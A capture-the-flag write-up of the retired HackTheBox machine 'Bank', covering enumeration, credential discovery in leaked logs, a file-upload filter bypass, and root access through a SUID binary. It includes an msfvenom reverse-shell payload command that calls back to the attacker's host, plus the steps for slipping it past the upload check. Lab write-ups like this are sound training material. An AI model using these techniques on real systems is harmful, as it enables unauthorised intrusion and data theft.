This series will follow my exercises in HackTheBox. All published writeups are for retired HTB machines. Whether or not I use Metasploit to pwn the server will be indicated in the title.
Machine IP: 10.10.10.29
I start off with my customary port scan. I’ve stopped using AutoRecon for a while now because I found much more value in running specific enumerations myself.
I identify the open ports and then interrogate them for additional information.
sudo nmap -sS -T4 -p- 10.10.10.29 Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-06 15:18 EDT Nmap scan report for 10.10.10.29 Host is up (0.013s latency). Not shown: 65532 closed ports PORT STATE SERVICE 22/tcp open ssh 53/tcp open domain 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 24.39 seconds
sudo nmap -sS -A -sC -sV -T4 -p 22,53,80 10.10.10.29 Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-06 15:19 EDT Nmap scan report for 10.10.10.29 Host is up (0.016s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 08:ee:d0:30:d5:45:e4:59:db:4d:54:a8:dc:5c:ef:15 (DSA) | 2048 b8:e0:15:48:2d:0d:f0:f1:73:33:b7:81:64:08:4a:91 (RSA) | 256 a0:4c:94:d1:7b:6e:a8:fd:07:fe:11:eb:88:d5:16:65 (ECDSA) |_ 256 2d:79:44:30:c8:bb:5e:8f:07:cf:5b:72:ef:a1:6d:67 (ED25519) 53/tcp open domain ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux) | dns-nsid: |_ bind.version: 9.9.5-3ubuntu0.14-Ubuntu 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) |_http-server-header: Apache/2.4.7 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 3.12 (95%), Linux 3.13 (95%), Linux 3.16 (95%), Linux 3.18 (95%), Linux 3.2 - 4.9 (95%), Linux 3.8 - 3.11 (95%), Linux 4.8 (95%), Linux 4.4 (95%), Linux 4.9 (95%), Linux 4.2 (95%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 80/tcp) HOP RTT ADDRESS 1 18.16 ms 10.10.14.1 2 18.27 ms 10.10.10.29
nmap -sU scan shows that
udp/53 is open as well.
An item of particular interest to me is that
tcp/53 is open. DNS is primarily served over UDP. The
tcp/53 port is often used for zone transfers. I will definitely want to try that. Additionally, the Apache web server on
tcp/80 will definitely be a primary target during my enumeration.
Now ready to dig into these findings, I attempt a zone transfer. HTB machines usually have the domain name
<box>.htb, so I guess that the server is
bank.htb. It works! I discover some additional subdomains for this server.
dig axfr @10.10.10.29 bank.htb ; <<>> DiG 9.16.3-Debian <<>> axfr @10.10.10.29 bank.htb ; (1 server found) ;; global options: +cmd bank.htb. 604800 IN SOA bank.htb. chris.bank.htb. 2 604800 86400 2419200 604800 bank.htb. 604800 IN NS ns.bank.htb. bank.htb. 604800 IN A 10.10.10.29 ns.bank.htb. 604800 IN A 10.10.10.29 www.bank.htb. 604800 IN CNAME bank.htb. bank.htb. 604800 IN SOA bank.htb. chris.bank.htb. 2 604800 86400 2419200 604800 ;; Query time: 8 msec ;; SERVER: 10.10.10.29#53(10.10.10.29) ;; WHEN: Sat Jun 06 16:06:36 EDT 2020 ;; XFR size: 6 records (messages 1, bytes 171)
Reviewing my notes after the fact, I never actually tried modifying
etc/hosts and reaching out to
chris.bank.htb. So the zone transfer is likely a red herring. Everything we need is on
So, let’s check out the web server. I start enumerating end points with Gobuster, one of my favorite tools. I don’t find anything.
gobuster dir -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http://10.10.10.29 =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.10.29 [+] Threads: 10 [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/big.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/06/06 15:26:56 Starting gobuster =============================================================== /.htaccess (Status: 403) /.htpasswd (Status: 403) /server-status (Status: 403) =============================================================== 2020/06/06 15:27:31 Finished ===============================================================
Hmm… I think about the DNS server again. I modify my
etc/resolv.conf file to set my nameserver as the Bank machine:
I now re-run Gobuster with the
bank.htb domain instead of the direct IP. Now we’re getting somewhere!
gobuster dir -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http://bank.htb =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://bank.htb [+] Threads: 10 [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/big.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/06/06 15:39:26 Starting gobuster =============================================================== /.htpasswd (Status: 403) /.htaccess (Status: 403) /assets (Status: 301) /inc (Status: 301) /server-status (Status: 403) /uploads (Status: 301) =============================================================== 2020/06/06 15:40:03 Finished ===============================================================
/inc, I see a directory is exposed and, in particular, a
I can’t view the contents of the file because my browser will execute the PHP instead of displaying the source, but I take a note of it as I’ll likely want to read it once I have a shell on the system.
I don’t see anything else of interest so I try Gobuster again, with a larger wordlist.
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://bank.htb/ -t 30 =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://bank.htb/ [+] Threads: 30 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/06/06 16:11:55 Starting gobuster =============================================================== /uploads (Status: 301) /assets (Status: 301) /inc (Status: 301) /server-status (Status: 403) /balance-transfer (Status: 301) =============================================================== 2020/06/06 16:14:07 Finished ===============================================================
Ah ha! A new endpoint,
/balance-transfer. That should be promising. Indeed, navigating to the endpoint reveals a directory with a ton of files.
Looking into some of these files, they appear to be transaction logs of whatever bank this server is pretending to be. I see encrypted credentials in each file. Maybe one of the files has unencrypted credentials?
There are a ton of files in the directory, however, so looking at each one was not going to work out. I notice that all of the files appear to have a size of
584. Some have
582, but all are around that size. So, I want to see if there was a file that has a significant different size. I use
ctrl+f in the browser and search for
58. The gives me a good visual indicator to scroll down the page and identify any file that is out of place. I find one!
This file is only
257 characters long. I navigate to the file and see that it logged a failed transaction. In this case, the encryption failed so it logged the user’s credentials in plaintext.
There is a login page at
bank.htb/login.php and I use these credentials to login.
Time for more enumeration! I look at what an authenticated user can do. There is a support page at
http://bank.htb/support.php and it looks like I can submit a support ticket with a file attachment. By hovering over the attachment link, I see in the bottom left that the attachment is available at
Ok! I want to upload a PHP web shell. I generate a payload with
msfvenom -p php/reverse_php LHOST=10.10.14.34 LPORT=443 > shell.php [-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload [-] No arch selected, selecting arch: php from the payload No encoder specified, outputting raw payload Payload size: 3005 bytes
I try to upload
shell.php directly, but get an error.
Only images, huh?
I have been proxying my browser traffic through Burp Suite, so I copy my file upload request and start modifying it. I change the
image/png and set a null terminator on the file name.
This works! But, the
.php file does not execute from
/uploads. I believe my null terminator broke it. However, inspecting the source of the web page in Burp I find something interesting…
The debug comment says
.htb files will execute as
.php. I modify my request in Burp to use
shell.htb instead of
shell.php (and drop the null terminator) and I can upload it successfully!
All right. Let’s see if it worked. I start a netcat listener on my machine and navigate to my file in the
uploads/ directory. It works and I get a shell as the
Time to gather information from the file system and escalate my privileges. I can read the user flag from
/home/chris as the
Now for the root shell.
user.php file I saw on the
/inc endpoint, I navigate to the web server directory and read the file. There is a
mysql connection string using root credentials stored in the file. There’s nothing I need in the database, though. I spent some time here in a rabiit hole.
Let’s run LinEnum!
I copied the file it generated onto my local system to review it, so the colorized text flags are all over it. However, I notice in its list of
SUID binaries that a particularly unusual one stands out.
var/htb/bin/emergency… Interesting. I run it. It elevates me to a root shell. Neat. I go ahead and read the root flag in